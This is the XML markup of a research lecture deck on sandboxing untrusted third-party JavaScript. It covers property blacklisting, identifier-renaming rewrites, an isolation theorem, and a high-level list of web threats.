              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>RegExp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>Error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>RangeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>ReferenceError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>TypeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>yntaxError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>EvalError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>constructor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>toString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>toLocaleString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>valueOf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>hasOwnProperty</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>propertyIsEnumerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" smtClean="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" smtClean="0"/>
              <a:t>isPrototypeOf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Rewrite 3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t>Rename other identifier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" i="1" dirty="0" smtClean="0"/>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" dirty="0" smtClean="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3500" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>pref_x</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3900" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="860000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Theorem: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>No application accesses the global scope or blacklisted properties of any object. If two applications interact, it is through native and non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1" smtClean="0"/>
              <a:t>renamable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t> properties.</a:t>
            </a:r>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56</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722313" y="2286000"/>
            <a:ext cx="7772400" cy="1500187"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="960000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Web Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US"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6</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2175933"/>
            <a:ext cx="8229600" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Screen short of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>WebSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> page</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>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7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="17410" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect l="438" t="9351" r="2941"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="152400"/>
            <a:ext cx="4902200" cy="6268508"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17409" name="Picture 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect l="939" t="9917" r="3442"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2082800" y="628650"/>
            <a:ext cx="4851400" cy="6229350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="5181600"/>
            <a:ext cx="2514600" cy="1371600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">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H="1">
            <a:off x="4615543" y="5334000"/>
            <a:ext cx="566057" cy="222738"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="860000"/>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threats (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Visit a bad web site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site may install malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Trick user into clicking “OK”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Exploit buffer overflow in browser implementation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Site may run malicious content in browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Port scanning using JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Same-origin policy provides some protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content from Site A cannot access data from Site B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="6492875"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>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5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="6492875"/>
            <a:ext cx="2438400" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>http://seclab.stanford.edu     </a:t>
            </a:r>
            <a:fld id="{B6F15528-21DE-4FAA-801E-634DDDAF4B2B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6492875"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>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t>HTML Image tags</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26628" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8737600" y="6616700"/>
            <a:ext cx="355600" cy="241300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{092085A5-28E5-4629-9411-16752C16900C}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="3124200"/>
            <a:ext cx="7848600" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="ECD882"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="40458C"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=“http://example.com/sunset.gif” height="50" width="100"&gt; </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 4" descr="beach sunset"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4330700" y="1143000"/>
            <a:ext cx="2527300" cy="1895475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1348026"/>
            <a:ext cx="3352800" cy="861774"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web site displays a picture </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>issues?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Date Placeholder 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="Gill Sans" charset="0"/>
                <a:cs typeface="Gill Sans" charset="0"/>
              </a:rPr>
              <a:t>Kanellakis Lecture, Brown Univ.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Footer Placeholder 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>Sandboxing Untrusted JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:ea typeface="Gill Sans" charset="0"/>
              <a:cs typeface="Gill Sans"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05/18/2007" val="LastModifie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5870</TotalTime>
  <Words>3597</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>634</Paragraphs>
  <Slides>56</Slides>
  <Notes>17</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Acrobat Document</vt:lpstr>
      <vt:lpstr>Safety on the Wild and Wooly World-Wide Web: Sandboxing Untrusted JavaScript </vt:lpstr>
      <vt:lpstr>Slide 2</vt:lpstr>
      <vt:lpstr>Slide 3</vt:lpstr>
      <vt:lpstr>Slide 4</vt:lpstr>
      <vt:lpstr>Outline</vt:lpstr>
      <vt:lpstr>Slide 6</vt:lpstr>
      <vt:lpstr>Slide 7</vt:lpstr>
      <vt:lpstr>Web threats (1)</vt:lpstr>
      <vt:lpstr>HTML Image tags</vt:lpstr>
      <vt:lpstr>HTML Image tags</vt:lpstr>
      <vt:lpstr>Port scanning behind firewall</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Web Threats (2)</vt:lpstr>
      <vt:lpstr>Mashups</vt:lpstr>
      <vt:lpstr>Advertisements</vt:lpstr>
      <vt:lpstr>Advertisements</vt:lpstr>
      <vt:lpstr>Maps</vt:lpstr>
      <vt:lpstr>Social Networking Sites</vt:lpstr>
      <vt:lpstr>Third-party content: Ads</vt:lpstr>
      <vt:lpstr>Third-party content: Apps</vt:lpstr>
      <vt:lpstr>Slide 22</vt:lpstr>
      <vt:lpstr>Facebook FBJS</vt:lpstr>
      <vt:lpstr>Slide 24</vt:lpstr>
      <vt:lpstr>JavaScript Challenges</vt:lpstr>
      <vt:lpstr>JavaScript Operational Semantics</vt:lpstr>
      <vt:lpstr>Operational Semantics</vt:lpstr>
      <vt:lpstr>Basis for JavaScript Isolation</vt:lpstr>
      <vt:lpstr>Isolating global variables</vt:lpstr>
      <vt:lpstr>J(B): a subset to enforce blacklisting</vt:lpstr>
      <vt:lpstr>The run time monitor IDX</vt:lpstr>
      <vt:lpstr>Evaluation</vt:lpstr>
      <vt:lpstr>Preventing scope manipulation</vt:lpstr>
      <vt:lpstr>J(B)G: a subset isolating the global scope</vt:lpstr>
      <vt:lpstr>J(B)S: a subset isolating all scope objects</vt:lpstr>
      <vt:lpstr>  Improving our solutions by wrapping</vt:lpstr>
      <vt:lpstr>Slide 37</vt:lpstr>
      <vt:lpstr>Comparison with FBJS</vt:lpstr>
      <vt:lpstr>Sample Facebook vulnerability</vt:lpstr>
      <vt:lpstr>Yahoo! AdSafe</vt:lpstr>
      <vt:lpstr>ADSafe Subtlety</vt:lpstr>
      <vt:lpstr>Slide 42</vt:lpstr>
      <vt:lpstr>FBJS limitations</vt:lpstr>
      <vt:lpstr>Defeat Sandbox</vt:lpstr>
      <vt:lpstr>How to isolate applications?</vt:lpstr>
      <vt:lpstr>Current Work</vt:lpstr>
      <vt:lpstr>Slide 47</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Additional related work</vt:lpstr>
      <vt:lpstr>Slide 50</vt:lpstr>
      <vt:lpstr>Slide 51</vt:lpstr>
      <vt:lpstr>Miscellaneous</vt:lpstr>
      <vt:lpstr>JavaScript Blacklisting</vt:lpstr>
      <vt:lpstr>Block access to global object</vt:lpstr>
      <vt:lpstr>Slide 55</vt:lpstr>
      <vt:lpstr>Isolate apps from each other?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710</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2009-12-04T03:16:42Z</dcterms:modified>
</cp:coreProperties>
</file>